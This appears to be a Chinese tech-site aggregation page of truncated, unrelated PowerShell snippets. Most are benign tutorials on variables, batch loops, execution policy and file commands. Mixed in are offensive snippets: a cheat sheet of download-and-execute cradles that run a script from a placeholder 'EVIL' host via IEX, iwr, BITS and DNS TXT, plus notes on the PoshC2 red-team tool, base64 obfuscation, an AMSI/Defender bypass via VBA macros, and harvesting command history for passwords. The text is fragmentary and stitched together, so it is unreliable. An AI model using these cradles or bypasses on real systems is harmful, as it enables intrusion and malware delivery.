运行”,安装完成后重启生效,重启后原本PowerShell的图标会变,执行Install-WMF5.1.ps1前首先要运行powershell开启下“允许执行脚本”,命令是set-ExecutionPolicy...RemoteSigned具体情况如下图,执行完这个命令后再执行Install-WMF5.1.ps1 image.png image.png image.png 查看powershell版本的命令...$PSVersionTable image.png 以下都是特别有用的powershell常用命令 【获取日志】 Get-EventLog -LogName security //安全相关 Get-WinEvent...把获取到的信息存在一个数组变量$sysinfo中($sysinfo = Get-SystemInfo),然后数组名.属性名来呈现系统具体信息($sysinfo.Hostname、$sysinfo.'...查看产品ID image.png 第二种:CMD命令行运行powershell,输入命令查看 (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\
git branch -D因为这个命令中的 grep、xargs 本身是 Shell script,在 windows 中的 cmd 和 PowerShell 中是不能用的。...26个字母中的任意一个,这些字母会区分大小写,也就是说,%%I和%%i会被认为不是同一个变量为了不与批处理中的%0~%9这10个形式变量发生冲突,请不要随意把%%I替换为%%0~%%9中的任意一个for...语句依次提取(xxx)中的每一个元素,把它的值赋予形式变量I,带到do后的command中参与命令的执行;当执行完一次do后的语句之后,再提取(xxx)中的下一个元素,再执行一次command,如此循环...,直到(xxx)中的所有元素都已经被提取完毕,该for语句才宣告执行结束批处理 for 命令主要作用:1、for循环for %I in (xxx) do command2、文本处理for /f %I in...PowerShell 中的条件和循环这些和普通的编程语言比较像,PowerShell 中实现换行多行命令输入,按住 ctrl + Enter# -lt:小于 (less than)for($i=0;$i
PowerShell命令 最近工作中写了大量的 PowerShell 脚本,将一些常用的命令分享出来,希望能帮助到大家。...$Directory ){ }else{ New-Item -Path $Directory -ItemType Directory -Force } 5.PowerShell 删除文件中的空行...粉丝福利 最近小伙伴们应该发现了公众号的一些变化,那就是在菜单栏中 『干货分享』的二级菜单中多了一个专栏 『万门大学』。没错,这正是公众号联合万门大学,为长久以来关注的粉丝争取的福利。...优质文章推荐: redis操作命令总结 MySQL相关操作 SQL查询语句 前端中那些让你头疼的英文单词 Flask框架重点知识总结回顾 团队开发注意事项 浅谈密码加密 Django框架中的英文单词...Django中数据库的相关操作 DRF框架中的英文单词 DRF框架 Django相关知识点回顾 python技术面试题-腾讯
文章前言 可以发现的是有不少渗透测试工具都是用PowerShell编写的,特别是对于红队团队的活动,因为大多数现代Windows都有PowerShell,而且管理员通常不会限制普通用户访问PowerShell...控制台,这给攻击者带来了很大的好处,特别是在蓝队不监视PowerShell使用情况下 PoshC2 工具介绍 来自Nettitude Labs和Dave Hardy的Ben Turner创建了一个基于PowerShell...和C#的命令和控制工具,该工具为红队操作提供了许多优势,因为它包含各种"植入方式"和技术,且易于使用,帮助菜单提供了有关PoshC2功能的所有详细信息。...Windows中的服务: ? 当然,还有其他的方法,这里就不逐一演示了~ ?...文末小结 PoshC2的主要好处是它使用PowerShell,因此它对植入物没有任何依赖性,就像用python编写的其他命令和控制工具一样,此外,它具有快速,可靠和易于使用的详细输出,绝对是任何红队运作的工具之一
在我们的迷你系列“Variables in Shells”中,了解如何在PowerShell中处理局部变量。...本文介绍在Windows,Linux或Mac上运行的PowerShell中的变量。...开源Bash Shell的用户可参考我有关Bash Shell中变量的文章(尽管你可以在Linux上运行PowerShell,并且它是开源的,因此你仍然可以继续阅读本文)。...在PowerShell中是否需要变量取决于你在终端中执行的操作。 对于某些用户而言,变量是管理数据的基本手段,而对于另一些用户而言,它们是次要的和暂时的便利,或者对于某些用户而言,它们也可能不存在。...在PowerShell中,可以通过定义变量名称,然后使用Set-Variable命令设置其值来创建变量。
什么是Windows系统的命令行环境,之前我们在使用XP、Win7系统的时候,用的最多的就是微软官方自带的cmd命令窗口了,我们通过敲命令行窗口可以实现和操作系统之间的交互。...当然随着微软技术的快速发展,到了目前比较流行的Win10操作系统,默认采用的就是PowerShell命令行交互工具了,今天小编就来给大家介绍Powershell相关的知识,希望对大家学习能带来一些帮助!...● 学习成本非常高,想做到通过dos命令实现操作系统的运维还是非常困难的 2、PowerShell的产生 微软官方从Win7操作系统就内置了PowerShell1.0版本。...● 支持多种编程语言,包括 C#、VB.NET 和 PowerShell,可以快速编写和重用现有的代码。 ● 能够安全地执行命令和脚本,保障系统和数据的安全性。...官方文档:https://learn.microsoft.com/zh-cn/powershell/ 4、PowerShell使用场景 PowerShell是一种Windows操作系统的命令行脚本语言,
Windows PowerShell运行hexo命令 前言 一个月前更新了Windows11,在桌面右键可以直接开启 Windows PowerShell 便在安装 git 时没有选择在右键快捷打开的配置...,便有了这篇水文 在新系统上装了hexo环境,可打开系统默认的 Windows PowerShell 运行命令却无法识别,以为是系统环境变量没设置好。...可在 Git bash 和 CMD 终端却可以执行,再仔细看 Windows PowerShell 中的提示,原来是提示的无法加载文件,因此在此系统上禁止运行脚本。...LinkID=135170 中的 `about_Execution_Policies`。 所在位置 行:1 字符: 1 此时,在 CMD 中执行以上命令都没问题,所以不是系统环境变量的问题。...解决方案 用管理员权限打开 Windows PowerShell ,运行以下命令: Set-ExecutionPolicy -ExecutionPolicy UNRESTRICTED 在提示中输入 Y
普通下载 IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") PowerShell 3.0+ IEX (iwr '...http://EVIL/evil.ps1') 隐藏的IE com对象 $ie=New-Object -comobject InternetExplorer.Application; $ie.visible...Start-BitsTransfer'http ://EVIL/evil.ps1'$ env:temp \ t; $ r = gc $ env:temp \ t; rm $ env:tempt; iex $ r PowerBreach的DNS...TXT方法 要执行的代码必须是存储在TXT记录中的base64编码的字符串 IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::
Powershell关键命令介绍 我们将在这介绍三种简单的但是很关键的命令,这些命令能够让你的 Powershell之旅更加顺利。...在Powershell里面, 大写的命令语句不会影响命令执行。 ---- Tab键的自动完成 可能是考虑到我们比较懒,Powershell也提供了支持tab键自动完成的功能。...一旦你输入了足够的命令来确保该语句唯一,即不会被别的重复的时候,你可以直接按tab键,powershell就会自动完成接下来的命令。...你可能也知道了,tab键的自动完成不但对某个命令起作用,对于所有的命令都起作用。 同样,当你使用Powershell的参数的时候,你也可以使用相同的自动填写功能。...---- 总结:Powershell命令行 如果你和一位经验丰富的Powershell用户,或者和某位专家聊天,他们都会告诉你,成功的秘诀就是简单。 请坚守这个定律直到你成功了。
[TOC] 前言 人生莫大的痛苦,莫过于学习下面这些命令参数,但是为了更好的掌握它又不得不去了解; PS脚本语言语Linux上的Shell有一致之处,这也是我为什么脱离了Bat而进入PS坑的原因; 进程与服务...-Process 进程常用cmdlet命令: #1.获取进程相关的cmdlet命令 PS > (Get-Command *-Process).Name #值得学习 Debug-Process Get-Process...nbtstat进行获取局域网中的指定计算机名的IPv4/6地址信息以及MAC地址; #1.获取本机计算机名相关信息 PS C:\Users\WeiyiGeek> Test-Connection -ComputerName...;" 时间日期 Get-Date 描述:时间日期对象可以直接利用其属性计算出当前年中的天数以及几天前和一天后的日期等等; Get-Date | Format-Custom {$_} #$_表示管道中当前对象...,有了这些类型可以做许多事情,幸运的是Powershell恰好支持这些类型。
前言 良好的习惯是人生产生复利的有力助手 上一篇讲解了APT攻击中用到的cmd命令混淆,本篇延续上一篇的内容,分析一下攻击中更加常用的powershell混淆和检测方法。...powershell的功能强大且调用方式十分灵活,目前大多数攻击者已经将PowerShell 应用在各种攻击场景中,如内网渗透,APT攻击甚至勒索软件中,在和各种组件,例如cmd,rundll32, 配合使用后...第4种的想法是 启动多个进程,例如cmd.exe,将要执行的命令内容放到进程参数中,要执行代码的时候,直接过滤出所需进程,并通过进程参数拼接出真正的执行内容, 5....编码 6.1 base64 在powershell命令行中,使用-EncodedCommand,而在脚本中使用FromBase64String IEX ([System.Text.Encoding]::...这是一种跨平台的解决方案, 能检测CMD,shell,powershell等多场景的命令混淆方式。静态检测的方式,对于动态生成+微混淆 的命令检测能力较弱。
[TOC] 0x00 前言简述 描述: 人生莫大的痛苦,莫过于学习下面这些命令参数,但是为了更好的掌握它又不得不去了解; PS 内置变量 - Variable $PSVersionTable #...显示相关 PowerShell 版本信息的哈希表 变量操作 描述:为了管理变量PS提供了五个专门管理变量的命令 Get-Variable Set-Variable New-Variable Remove-Variable...::name # PSDrive : Variable # PSProvider : Microsoft.PowerShell.CoreVariable # PSIsContainer...SetVariable" Set-Variable var -Option "ReadOnly" -Description "This is readOnly" -Force Get-Variable 描述:利用该命令获取创建的变量相关的信息...;" ---- 时间日期 Get-Date 描述:时间日期对象可以直接利用其属性计算出当前年中的天数以及几天前和一天后的日期等等; Get-Date | Format-Custom {$_} #$_表示管道中当前对象
简介: powershell命令仅输出目录列表 powershell命令仅输出目录列表 大于powershell 3.0版本可以使用Get-Item、ls、dir、gci Get-Item Get-ChildItem...where {$_.Attributes -match'Directory'} Get-ChildItem "$path" -attributes D -Recurse ls(alias) dir 小于powershell...{ $_.PSIsContainer } Copy 如果你想要目录的原始字符串名称,你可以这么做 Get-ChildItem -Recurse | ?
标签:VBA,Evaluate 可能很少有人注意到Evaluate命令,也很少被使用,然而,它非常强大且有用。...例如,直接在VBA中使用工作表公式,Evaluate就可以做到: Sub Neato() MsgBox Evaluate("SUM(A1:A6)") End Sub 当然,你可以不使用Evaluate...也就是说: [A1:A6].Select 等同于: Evaluate("A1:A6").Select 这样,上文中的第一段代码可简化为: MsgBox [SUM(A1:A6)] 这些括号,就像是VBA中的单元格...还有一个“秘密”就是,也可以在定义的单元格区域名称中使用EVALUATE,因此有一些方法可以在不使用VBA的情况下访问单元格公式中EVALUATE的功能。...它包含工作表单元格的所有功能,而“该单元格”包含在VBA命令中。事实上,它甚至可以做单元格不能做的事:可以返回整个数组。
0x00前言 我在最近的学习过程中,发现PowerShell的命令的历史记录有时会包含系统敏感信息,例如远程服务器的连接口令,于是我对PowerShell的的历史记录功能做了进一步研究,总结一些渗透测试中常用导出历史记录的方法...0x01简介 本文将要介绍以下内容: 1.两种PowerShell的命令的历史记录 2.导出PowerShell的命令历史记录的方法 3.防御建议 0x02两种Powershell命令的历史记录 记录PowerShell...view=powershell-3.0 默认Powershell v2及以上支持能够记录当前会话中输入的命令,多个PowerShell的进程之间不共享,Powershell的进程退出后自动清除所有记录。...的进程中的历史记录。...对于低版本的Powershell的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除,命令为:Clear-History 对于cmd.exe的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除
1、New-Item 创建新项命令cmdlet New-Item 将创建新项并设置其值。 可创建的项类型取决于项的位置。 例如,在文件系统 New-Item 中创建文件和文件夹。...在注册表中, New-Item 创建注册表项和条目。New-Item 还可以设置它创建的项的值。 例如,在创建新文件时, New-Item 可以向文件添加初始内容。...练习PowerShell 练习一次性创建两个目录New-Item -ItemType "directory" -Path "E:\PowerShell 练习\01","E:\PowerShell 练习...2、Remove-Item 删除项命令Remove-Item cmdlet 删除一个或多个项。它支持删除许多不同类型的项,包括文件、文件夹、注册表项、变量、别名和函数。...3、Rename-Item 项重命名该命令主要是用来给项目进行重命名,支持文件、目录、注册表等文件类型,并且也可以批量重命名操作。
基本数据类型 PowerShell本身是基于.Net开发出来的,所以在.Net中的基本数据类型,在PowerShell中也可以使用,只是在PowerShell中用”[]”来标识具体的数据类型。...使用-is来判断某个变量是否指定的数据类型,和C#中的is关键字是一样的。...数据类型转换 关于默认数据类型转换,PowerShell和C#的行为有所不同。PowerShell会根据第一个变量的类型作为目标类型,然后将运算后面的联系转换为第一个类型。...Get-XXX命令,很多都是返回对应类型的Array,比如Get-Process....$a='aaa','bb','c' 如果是申明一个空的集合,就必须写为: $a=@() 与C#不同的是,在PowerShell中,往集合中添加元素,可以使用+=符号。
在linux中,想看某个目录下各个文件和目录大小的时候,还是很方便的,windows下怎么办呢。在powershell控制台下,到达要查看的路径下,将下面代码粘贴,点回车。...步骤2,打开ps控制台,转到自己想要去的路径以后,右击鼠标。图片图片步骤3,点【仍然粘贴】图片步骤4,敲回车图片======上述代码是从一个网站上抄来的,抱歉,没有保存那个网址。
本文将浅析GadgetToJScript的反序列化原理与在VBA中的利用。...而在VBA中的被检测的列表已有大佬整理了出来: https://github.com/synacktiv/AMSI-Bypass ? ? 当然,DDE与excel 4.0是不受amsi所保护的。...然后放入宏中 ? 然后我们换成之前的COM 对象来启动进程,弹出notepad ? 但是直接生成的payload是会被windows defender所检测到的,需要自行混淆。...但目前该类方法我们利用起来仍然不是很好利用,因为虽然可以绕过windows defender的检测,但假如我们使用com去调用powershell远程加载的时候仍然无法绕过widnows defender...但这已不是宏需要考虑的了,而是在powershell中amsi patch的问题了,在前方的代码中加入amsi patch,即可然过wdf对ps的检查,得到Cs的beacon。 ?
识别状态OK的摄像头 Get-PnpDevice -FriendlyName *cam* -Class Camera -Status OK Get-PnpDevice -FriendlyName *cam...ft -aut Get-PnpDevice -FriendlyName *cam* -Class Camera|where {$_.Status -like "OK"}|ft -auto 禁用状态为OK的摄像头...InstanceId (Get-PnpDevice -FriendlyName *cam* -Class Camera -Status OK).InstanceId -Confirm:$false 启用被禁用的摄像头
领取专属 10元无门槛券
手把手带您无忧上云